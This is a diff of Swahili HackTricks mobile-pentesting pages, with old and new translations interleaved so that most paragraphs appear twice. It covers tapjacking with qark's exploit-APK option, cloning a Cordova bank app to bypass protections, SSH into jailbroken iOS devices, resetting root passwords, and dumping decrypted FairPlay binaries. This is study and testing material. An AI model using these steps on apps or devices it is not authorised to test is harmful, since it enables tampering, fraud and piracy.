Mradi wa mfano unaoendeleza **FloatingWindowApp**, ambao unaweza kutumika kuweka juu ya shughuli zingine kutekeleza shambulio la clickjacking, unaweza kupatikana hapa [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (kidogo umri, bahati njema kujenga apk).
Mradi wa mfano unaotekeleza **FloatingWindowApp**, ambayo inaweza kutumika kuweka juu ya shughuli nyingine ili kufanya shambulio la clickjacking, unaweza kupatikana katika [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (ni ya zamani kidogo, bahati njema katika kujenga apk).
### Qark
{% hint style="danger" %}
Inaonekana kama mradi huu sasa hauendelezwi tena na hii kazi haifanyi kazi ipasavyo tena
Inaonekana mradi huu sasa hauhifadhiwi na kazi hii haifanyi kazi vizuri tena
{% endhint %}
Unaweza kutumia [**qark**](https://github.com/linkedin/qark) na vigezo `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` ili kuunda programu yenye nia mbaya kufanya majaribio ya uwezekano wa mapungufu ya **Tapjacking**.
Unaweza kutumia [**qark**](https://github.com/linkedin/qark) na vigezo `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` ili kuunda programu mbaya ya kujaribu uwezekano wa **Tapjacking** udhaifu.\
Kupunguza hatari ni rahisi kwa sababu mwandishi wa programu anaweza kuchagua kutokupokea matukio ya kugusa wakati maoni yanafunikwa na mengine. Kutumia [Marejeleo ya Developer wa Android](https://developer.android.com/reference/android/view/View#security):
Kuzuia ni rahisi kwa sababu mtengenezaji anaweza kuchagua kutopokea matukio ya kugusa wakati mtazamo umefunikwa na mwingine. Kutumia [Marejeo ya Wataalamu wa Android](https://developer.android.com/reference/android/view/View#security):
> Mara kwa mara ni muhimu kwamba programu iweze kuthibitisha kwamba hatua inafanywa kwa idhini kamili ya mtumiaji, kama vile kutoa ombi la idhini, kufanya ununuzi au bonyeza tangazo. Kwa bahati mbaya, programu inayodhuru inaweza kujaribu kudanganya mtumiaji kufanya hatua hizi, bila kujua, kwa kuficha lengo la maoni. Kama tiba, mfumo hutoa mbinu ya kuchuja kugusa ambayo inaweza kutumika kuboresha usalama wa maoni yanayotoa ufikiaji wa kazi nyeti.
> Wakati mwingine ni muhimu kwa programu kuweza kuthibitisha kwamba kitendo kinafanywa kwa maarifa na idhini kamili ya mtumiaji, kama vile kutoa ombi la ruhusa, kufanya ununuzi au kubonyeza tangazo. Kwa bahati mbaya, programu mbaya inaweza kujaribu kumdanganya mtumiaji kufanya vitendo hivi, bila kujua, kwa kuficha kusudi lililokusudiwa la mtazamo. Kama suluhisho, mfumo unatoa mekanizma ya kuchuja kugusa ambayo inaweza kutumika kuboresha usalama wa mitazamo inayotoa ufikiaji wa kazi nyeti.
>
> Ili kuwezesha kuchuja kugusa, piga simu [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) au weka sifa ya mpangilio ya android:filterTouchesWhenObscured kuwa kweli. Ikiwa imeanzishwa, mfumo utatupa kugusa zinazopokelewa wakati wowote dirisha la maoni linapositishwa na dirisha lingine linaloonekana. Matokeo yake, maoni hayatapokea kugusa wakati wowote toast, dirisha au dirisha lingine linaonekana juu ya dirisha la maoni.
> Ili kuwezesha kuchuja kugusa, piga [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) au weka sifa ya mpangilio ya android:filterTouchesWhenObscured kuwa kweli. Wakati imewezeshwa, mfumo utatupa kugusa ambazo zinapokelewa kila wakati dirisha la mtazamo linapofunikwa na dirisha lingine linaloonekana. Kama matokeo, mtazamo hautapokea kugusa kila wakati toast, mazungumzo au dirisha lingine linapojitokeza juu ya dirisha la mtazamo.
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

66
mobile-pentesting/cordova-apps.md
View file

@ -1,77 +1,79 @@
# Programu za Cordova
# Cordova Apps
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kwa maelezo zaidi angalia [https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58](https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58)**. Hii ni muhtasari:
Apache Cordova inatambuliwa kwa kuwezesha maendeleo ya **programu za hibridi** kwa kutumia **JavaScript, HTML, na CSS**. Inaruhusu uundaji wa programu za Android na iOS; hata hivyo, hauna mfumo wa msingi wa kusaidia usalama wa chanzo cha programu. Tofauti na React Native, Cordova haikusanyi chanzo cha programu kwa chaguomsingi, ambayo inaweza kusababisha udhaifu wa kubadilisha nambari. Cordova hutumia WebView kuonyesha programu, ikifichua nambari ya HTML na JavaScript hata baada ya kusanywa kwenye faili za APK au IPA. Kwa upande mwingine, React Native hutumia JavaScript VM kutekeleza nambari ya JavaScript, ikitoa ulinzi bora wa chanzo cha nambari.
Apache Cordova inatambulika kwa kuwezesha maendeleo ya **maombi ya mchanganyiko** kwa kutumia **JavaScript, HTML, na CSS**. Inaruhusu uundaji wa maombi ya Android na iOS; hata hivyo, haina mekanizma ya msingi ya kulinda msimbo wa chanzo wa programu. Kinyume na React Native, Cordova haitengenezi msimbo wa chanzo kwa msingi, ambayo inaweza kusababisha udhaifu wa kubadilisha msimbo. Cordova inatumia WebView kuonyesha maombi, ikifunua msimbo wa HTML na JavaScript hata baada ya kutengenezwa kuwa faili za APK au IPA. React Native, kinyume chake, inatumia JavaScript VM kutekeleza msimbo wa JavaScript, ikitoa ulinzi bora wa msimbo wa chanzo.
### Kujenga Nakala ya Programu ya Cordova
### K cloning ya Programu ya Cordova
Kabla ya kujenga nakala ya programu ya Cordova, hakikisha kuwa NodeJS imefungwa pamoja na mahitaji mengine kama Android SDK, Java JDK, na Gradle. Nyaraka rasmi za Cordova [hutoa mwongozo kamili](https://cordova.apache.org/docs/en/11.x/guide/cli/#install-pre-requisites-for-building) kwa ufungaji huu.
Kabla ya cloning ya programu ya Cordova, hakikisha kuwa NodeJS imewekwa pamoja na mahitaji mengine kama Android SDK, Java JDK, na Gradle. [Nyaraka rasmi za Cordova](https://cordova.apache.org/docs/en/11.x/guide/cli/#install-pre-requisites-for-building) inatoa mwongozo kamili wa usakinishaji huu.
Fikiria programu ya mfano inayoitwa `Bank.apk` na jina la pakiti `com.android.bank`. Ili kupata chanzo cha programu, fungua faili ya `bank.apk` na nenda kwenye folda ya `bank/assets/www`. Folda hii ina chanzo kamili cha programu, pamoja na faili za HTML na JS. Mazingira ya programu yanaweza kupatikana kwenye faili ya `bank/res/xml/config.xml`.
Fikiria mfano wa programu inayoitwa `Bank.apk` yenye jina la kifurushi `com.android.bank`. Ili kufikia msimbo wa chanzo, fungua `bank.apk` na uelekee kwenye folda `bank/assets/www`. Folda hii ina msimbo kamili wa chanzo wa programu, ikiwa ni pamoja na faili za HTML na JS. Mipangilio ya programu inaweza kupatikana katika `bank/res/xml/config.xml`.
Kufanya nakala ya programu, fuata hatua hizi:
Ili cloning ya programu, fuata hatua hizi:
```bash
npm install -g cordova@latest
cordova create bank-new com.android.bank Bank
cd bank-new
```
Nakili maudhui ya `bank/assets/www` hadi `bank-new/www`, isipokuwa `cordova_plugins.js`, `cordova.js`, `cordova-js-src/`, na saraka ya `plugins/`.
Kopi taarifa za `bank/assets/www` hadi `bank-new/www`, ukiondoa `cordova_plugins.js`, `cordova.js`, `cordova-js-src/`, na saraka ya `plugins/`.
Taja jukwaa (Android au iOS) unapounda mradi mpya wa Cordova. Kwa kuchukua nakala ya programu ya Android, ongeza jukwaa la Android. Kumbuka kuwa toleo la jukwaa la Cordova na viwango vya API vya Android ni tofauti. Angalia [nyaraka](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) za Cordova kwa maelezo juu ya toleo la jukwaa na viwango vya API vya Android vinavyoungwa mkono.
Taja jukwaa (Android au iOS) unapounda mradi mpya wa Cordova. Kwa kunakili programu ya Android, ongeza jukwaa la Android. Kumbuka kwamba toleo za jukwaa la Cordova na viwango vya API vya Android ni tofauti. Angalia [nyaraka](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) za Cordova kwa maelezo kuhusu toleo za jukwaa na APIs za Android zinazoungwa mkono.
Ili kujua toleo sahihi la jukwaa la Cordova Android, angalia `PLATFORM_VERSION_BUILD_LABEL` katika faili ya `cordova.js` ya programu ya awali.
Ili kubaini toleo sahihi la jukwaa la Cordova Android, angalia `PLATFORM_VERSION_BUILD_LABEL` katika faili ya `cordova.js` ya programu ya asili.
Baada ya kuweka jukwaa, sanidi programu zinazohitajika. Faili ya `bank/assets/www/cordova_plugins.js` ya programu ya awali inaorodhesha programu zote na toleo zao. Sanidi kila programu kwa kujitegemea kama inavyoonyeshwa hapa chini:
Baada ya kuweka jukwaa, sakinisha plugins zinazohitajika. Faili ya `bank/assets/www/cordova_plugins.js` ya programu ya asili inataja plugins zote na toleo zao. Sakinisha kila plugin moja kwa moja kama inavyoonyeshwa hapa chini:
```bash
cd bank-new
cordova plugin add cordova-plugin-dialogs@2.0.1
```
Ikiwa programu-jalizi haipatikani kwenye npm, inaweza kupatikana kutoka GitHub:
Ikiwa plugin haipatikani kwenye npm, inaweza kupatikana kutoka GitHub:
```bash
cd bank-new
cordova plugin add https://github.com/moderna/cordova-plugin-cache.git
```
Hakikisha kuwa mahitaji yote yanakidhi kabla ya kuanza kuchapisha:
Hakikisha mahitaji yote ya awali yamekamilishwa kabla ya kukusanya:
```bash
cd bank-new
cordova requirements
```
Kutengeneza APK, tumia amri ifuatayo:
Ili kujenga APK, tumia amri ifuatayo:
```bash
cd bank-new
cordova build android — packageType=apk
```
Amri hii inazalisha APK na chaguo la kuhariri limezimishwa, ikirahisisha uhariri kupitia Google Chrome. Ni muhimu kusaini APK kabla ya kuiweka, hasa ikiwa programu ina mekanizm ya kugundua uharibifu wa nambari.
Hii amri inazalisha APK yenye chaguo la debug limewezeshwa, ikirahisisha ufuatiliaji kupitia Google Chrome. Ni muhimu kusaini APK kabla ya usakinishaji, hasa ikiwa programu ina mifumo ya kugundua udanganyifu wa msimbo.
### Zana ya Kiotomatiki
### Zana ya Utaftaji
Kwa wale wanaotafuta kiotomatiki mchakato wa kujirudia, **[MobSecco](https://github.com/Anof-cyber/MobSecco)** ni zana iliyopendekezwa. Inafanya mchakato wa kujirudia wa programu za Android kuwa rahisi, ikisimplisha hatua zilizoelezwa hapo juu.
Kwa wale wanaotafuta kuharakisha mchakato wa kunakili, **[MobSecco](https://github.com/Anof-cyber/MobSecco)** ni zana inayopendekezwa. Inarahisisha kunakili programu za Android, ikifanya hatua zilizoelezwa hapo juu kuwa rahisi.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

132
mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md
View file

@ -1,28 +1,29 @@
# Uchunguzi wa Msingi wa Ufundi wa iOS
# iOS Basic Testing Operations
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **Muhtasari wa Kutambua na Kupata Ufikiaji wa Kifaa cha iOS**
## **Muhtasari wa Utambuzi wa Kifaa cha iOS na Ufikiaji**
### **Kutambua UDID ya Kifaa cha iOS**
### **Kuutambua UDID wa Kifaa cha iOS**
Kutambua kifaa cha iOS kwa kipekee, hutumika mfuatano wa tarakimu 40 unaojulikana kama UDID. Kwenye macOS Catalina au mpya zaidi, hii inaweza kupatikana kwenye programu ya **Finder**, kwani iTunes haipo tena. Kifaa, mara kilipounganishwa kupitia USB na kuchaguliwa kwenye Finder, inaonyesha UDID yake pamoja na habari nyingine wakati maelezo chini ya jina lake yanapobonyezwa.
Ili kutambua kifaa cha iOS kwa kipekee, mfuatano wa tarakimu 40 unaojulikana kama UDID unatumika. Kwenye macOS Catalina au toleo jipya, hii inaweza kupatikana kwenye **app ya Finder**, kwani iTunes haipo tena. Kifaa, kinapounganishwa kupitia USB na kuchaguliwa kwenye Finder, kinaonyesha UDID yake pamoja na taarifa nyingine wakati maelezo chini ya jina lake yanapobofya.
Kwa toleo la macOS kabla ya Catalina, iTunes inawezesha ugunduzi wa UDID. Maelekezo ya kina yanaweza kupatikana [hapa](http://www.iclarified.com/52179/how-to-find-your-iphones-udid).
Kwa matoleo ya macOS kabla ya Catalina, iTunes inarahisisha kugundua UDID. Maelekezo ya kina yanaweza kupatikana [hapa](http://www.iclarified.com/52179/how-to-find-your-iphones-udid).
Zana za amri ya mstari hutoa njia mbadala za kupata UDID:
Zana za mstari wa amri zinatoa njia mbadala za kupata UDID:
* **Kutumia zana ya I/O Registry Explorer `ioreg`:**
```bash
@ -41,99 +42,99 @@ $ system_profiler SPUSBDataType | sed -n -e '/iPad/,/Serial/p;/iPhone/,/Serial/p
```bash
$ instruments -s devices
```
### **Kupata Kifaa cha Shell**
### **Kupata Ufikiaji wa Shell ya Kifaa**
**Upatikanaji wa SSH** umewezeshwa kwa kufunga **kifurushi cha OpenSSH** baada ya kufungua kifaa, kuruhusu uunganisho kupitia `ssh root@<anwani_ya_ip_ya_kifaa>`. Ni muhimu kubadilisha nywila za msingi (`alpine`) kwa watumiaji `root` na `mobile` ili kuhakikisha usalama wa kifaa.
**Ufikiaji wa SSH** umewezeshwa kwa kufunga **pakiti ya OpenSSH** baada ya jailbreak, kuruhusu muunganisho kupitia `ssh root@<device_ip_address>`. Ni muhimu kubadilisha nywila za msingi (`alpine`) kwa watumiaji `root` na `mobile` ili kulinda kifaa.
**SSH kupitia USB** inakuwa muhimu ikiwa hakuna Wi-Fi, kwa kutumia `iproxy` kuweka ramani ya bandari za kifaa kwa ajili ya uunganisho wa SSH. Hii inawezesha upatikanaji wa SSH kupitia USB kwa kutekeleza:
**SSH kupitia USB** inakuwa muhimu pindi Wi-Fi haitapatikana, kwa kutumia `iproxy` kuunganisha bandari za kifaa kwa muunganisho wa SSH. Mpangilio huu unaruhusu ufikiaji wa SSH kupitia USB kwa kukimbia:
```bash
$ iproxy 2222 22
$ ssh -p 2222 root@localhost
```
**Programu za kushughulikia kifaa kwenye kifaa**, kama vile NewTerm 2, hufanikisha mwingiliano wa moja kwa moja na kifaa, hasa ni muhimu kwa ajili ya kutatua matatizo. **Maboya ya SSH ya kugeuza** pia yanaweza kuanzishwa kwa ajili ya ufikiaji wa kijijini kutoka kwenye kompyuta ya mwenyeji.
**On-device shell applications**, kama NewTerm 2, hurahisisha mwingiliano wa moja kwa moja na kifaa, hasa ni muhimu kwa ajili ya kutatua matatizo. **Reverse SSH shells** pia zinaweza kuanzishwa kwa ufikiaji wa mbali kutoka kwa kompyuta mwenyeji.
### **Kurejesha Nywila Zilizosahaulika**
### **Kurekebisha Nywila Iliyosahaulika**
Ili kurejesha nywila iliyosahaulika kurudi kwenye chaguo-msingi (`alpine`), ni lazima kuhariri faili ya `/private/etc/master.passwd`. Hii inahusisha kubadilisha hash iliyopo na hash kwa ajili ya `alpine` karibu na maelezo ya mtumiaji wa `root` na `mobile`.
Ili kurekebisha nywila iliyosahaulika kurudi kwenye chaguo-msingi (`alpine`), kuhariri faili ya `/private/etc/master.passwd` ni muhimu. Hii inahusisha kubadilisha hash iliyopo na hash ya `alpine` karibu na entries za mtumiaji `root` na `mobile`.
## **Mbinu za Uhamishaji wa Data**
## **Mbinu za Uhamasishaji wa Data**
### **Uhamishaji wa Faili za Data za Programu**
### **Kuhamisha Faili za Data za Programu**
**Kuhifadhi na Kupata kwa Kutumia SSH na SCP:** Ni rahisi kuhifadhi saraka ya Data ya programu kwa kutumia `tar` na kisha kuhamisha kwa kutumia `scp`. Amri ifuatayo inahifadhi saraka ya saraka ya Data katika faili ya .tgz, ambayo kisha inavutwa kutoka kwenye kifaa:
**Archiving and Retrieval via SSH and SCP:** Ni rahisi kuhifadhi saraka ya Data ya programu kwa kutumia `tar` na kisha kuhamasisha kwa kutumia `scp`. Amri iliyo hapa chini inahifadhi saraka ya Data katika faili ya .tgz, ambayo kisha inavutwa kutoka kwa kifaa:
```bash
tar czvf /tmp/data.tgz /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693
exit
scp -P 2222 root@localhost:/tmp/data.tgz .
```
### **Zana za Kiolesura cha Mtumiaji cha Picha**
### **Zana za Kiolesura cha Mtumiaji**
**Kutumia iFunbox na iExplorer:** Zana hizi za GUI ni muhimu kwa kusimamia faili kwenye vifaa vya iOS. Hata hivyo, kuanzia iOS 8.4, Apple imezuia upatikanaji wa zana hizi kwenye sanduku la maombi isipokuwa kifaa kimefungwa.
**Kutumia iFunbox na iExplorer:** Zana hizi za GUI ni muhimu kwa usimamizi wa faili kwenye vifaa vya iOS. Hata hivyo, kuanzia iOS 8.4, Apple ilipunguza ufikiaji wa zana hizi kwenye sandbox ya programu isipokuwa kifaa kimefanywa jailbroken.
### **Kutumia Objection kwa Usimamizi wa Faili**
**Kifaa cha Shell cha Kuingiliana na Objection:** Kuzindua objection hutoa upatikanaji kwenye saraka ya Bundle ya programu. Kutoka hapa, unaweza kusafiri kwenye saraka ya Nyaraka ya programu na kusimamia faili, ikiwa ni pamoja na kupakua na kupakia kutoka kwenye kifaa cha iOS.
**Shell ya Kihusiano na Objection:** Kuanzisha objection kunatoa ufikiaji wa saraka ya Bundle ya programu. Kutoka hapa, unaweza kuhamasisha kwenye saraka ya Hati za programu na kusimamia faili, ikiwa ni pamoja na kupakua na kupakia faili hizo kutoka na kwenda kwenye kifaa cha iOS.
```bash
objection --gadget com.apple.mobilesafari explorer
cd /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents
file download <filename>
```
## **Kupata na Kuchanganua Programu**
## **Kupata na Kutolewa kwa Programu**
### **Kupata Faili ya IPA**
### **Kupata Faili la IPA**
**Kiungo cha Usambazaji wa Juu ya Hewani (OTA):** Programu zilizosambazwa kwa ajili ya majaribio kupitia OTA zinaweza kupakuliwa kwa kutumia zana ya kupakua mali ya huduma za ITMS, ambayo imewekwa kupitia npm na hutumiwa kuokoa faili ya IPA kwa kiwango cha ndani.
**Kiungo cha Usambazaji Juu ya Hewa (OTA):** Programu zinazotolewa kwa ajili ya majaribio kupitia OTA zinaweza kupakuliwa kwa kutumia chombo cha kupakua mali za huduma za ITMS, ambacho kimewekwa kupitia npm na kinatumika kuhifadhi faili la IPA kwenye kifaa.
```bash
npm install -g itms-services
itms-services -u "itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist" -o - > out.ipa
```
### **Kuchukua Programu ya Binary**
### **Kutoa Binary ya App**
1. **Kutoka kwa IPA:** Fungua IPA ili kupata programu ya binary iliyofunguliwa.
2. **Kutoka kwa Kifaa kilichovunjwa:** Sakinisha programu na chukua binary iliyofunguliwa kutoka kumbukumbu.
1. **Kutoka kwa IPA:** Fungua IPA ili kufikia binary ya app iliyotolewa.
2. **Kutoka kwa Kifaa kilichovunjwa:** Sakinisha app na toa binary iliyotolewa kutoka kwenye kumbukumbu.
### **Mchakato wa Kufungua**
**Muhtasari wa Kufungua kwa Mikono:** Programu za iOS zinafungwa kwa kutumia FairPlay na Apple. Ili kurejesha, mtu lazima achukue binary iliyofunguliwa kutoka kumbukumbu. Mchakato wa kufungua unahusisha kuchunguza bendera ya PIE, kurekebisha bendera za kumbukumbu, kutambua sehemu iliyofungwa, na kisha kuchukua na kubadilisha sehemu hii na fomu yake iliyofunguliwa.
**Muhtasari wa Kufungua kwa Mikono:** Binary za app za iOS zimefungwa na Apple kwa kutumia FairPlay. Ili kufanya reverse-engineering, lazima utoe binary iliyotolewa kutoka kwenye kumbukumbu. Mchakato wa kufungua unajumuisha kuangalia bendera ya PIE, kurekebisha bendera za kumbukumbu, kubaini sehemu iliyofungwa, na kisha kutoa na kubadilisha sehemu hii na fomu yake iliyotolewa.
**Kuchunguza na Kubadilisha Bendera ya PIE:**
**Kuangalia na Kubadilisha Bendera ya PIE:**
```bash
otool -Vh Original_App
python change_macho_flags.py --no-pie Original_App
otool -Vh Hello_World
```
**Kutambua Sehemu Iliyofichwa na Kudondosha Kumbukumbu:**
**Kutambua Sehemu Iliyosimbwa na Kutupa Kumbukumbu:**
Tambua anwani za kuanza na kumaliza sehemu iliyofichwa kwa kutumia `otool` na kudondosha kumbukumbu kutoka kifaa kilichovunjwa ulinzi kwa kutumia gdb.
Tathmini anwani za mwanzo na mwisho za sehemu iliyosimbwa kwa kutumia `otool` na utupe kumbukumbu kutoka kwa kifaa kilichovunjwa kwa kutumia gdb.
```bash
otool -l Original_App | grep -A 4 LC_ENCRYPTION_INFO
dump memory dump.bin 0x8000 0x10a4000
```
**Kuandika upya Sehemu Iliyofichwa:**
**Kufuta Sehemu Iliyoandikwa kwa Siri:**
Badilisha sehemu iliyoifichwa katika faili ya asili ya programu na nakala iliyofichuliwa.
Badilisha sehemu iliyokuwa imeandikwa kwa siri katika programu asilia na dump iliyotolewa.
```bash
dd bs=1 seek=<starting_address> conv=notrunc if=dump.bin of=Original_App
```
